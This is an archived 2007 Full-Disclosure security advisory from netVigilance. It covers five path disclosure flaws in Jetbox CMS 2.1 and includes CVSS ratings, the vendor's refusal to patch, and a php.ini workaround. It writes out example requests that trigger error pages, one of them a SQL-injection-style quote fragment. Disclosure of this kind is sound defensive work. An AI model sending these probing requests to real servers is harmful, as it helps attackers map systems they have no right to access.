[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Jetbox CMS version 2.1 Multiple Path Disclosure
From: "SecurityResearch" <securityresearch () netvigilance ! com>
Date: 2007-05-21 10:35:32
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A553 () beaverton ! portland ! local
[Download RAW message or body]
netVigilance Security Advisory #27
Jetbox CMS version 2.1 Multiple Path Disclosure Vulnerabilities
Description:
Jetbox CMS is seriously tested on usability & has a professional intuitive interface. \
The system is role based, with workflow and module orientated. All content is fully \
separated from layout. It uses php & mysql. External References:
Mitre CVE: CVE-2007-2684
NVD NIST: CVE-2007-2684
OSVDB: 34783
Summary:
Jetbox CMS seriously tested on usability & has a professional intuitive interface.
Security problems in the product allow attackers to gather the true path of the \
server-side script. Advisory URL:
http://www.netvigilance.com/advisory0027
Release Date:
05/21/2007
Severity:
Risk: Low
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
Vulnerable Systems:
Jetbox CMS version 2.1
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal \
Errors.
Vendor:
Streamedge Consultancy & Development
Vendor Status:
Contact with the Vendor was established. The vendor refused to fix the issue and said \
that Jetbox is not maintained already. There is no official fix at the release of \
this Security Advisory Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = \
Off. Use .htaccess directives to deny access to this files (works \
only for Apache);
Example:
Path Disclosure Vulnerability 1
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/main_page.php
REPLY:
...<b>Fatal error</b>: Call to a member function on a non-object in <b>[SERVER \
PATH][JETBOX-DIRECTORY]\main_page.php</b> on line <b>7</b><br />... Path Disclosure \
Vulnerability 2 REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/open_tree.php
REPLY:
...<b>Fatal error</b>: Call to a member function on a non-object in <b>[SERVER \
PATH][JETBOX-DIRECTORY]\open_tree.php</b> on line <b>12</b><br />... Path Disclosure \
Vulnerability 3 REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/outputs.php
REPLY:
...<b>Fatal error</b>: Call to a member function on a non-object in <b>[SERVER \
PATH][JETBOX-DIRECTORY]\open_tree.php</b> on line <b>12</b><br />... Path Disclosure \
Vulnerability 4 REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/?view='%20AND
REPLY:
...q: SELECT * FROM navigation WHERE view_name='' AND'<br /> Line: 146 <br/>File: \
[SERVER PATH][JETBOX-DIRECTORY]index.php... Path Disclosure Vulnerability 5
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/admin/cms/opentree.php?task=editrecord&id[]=42
REPLY:
...<b>Fatal error</b>: Unsupported operand types in <b>[SERVER \
PATH][JETBOX-DIRECTORY]\includes\jetstream_core_one.inc.php</b> on line <b>110</b><br \
/>...
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic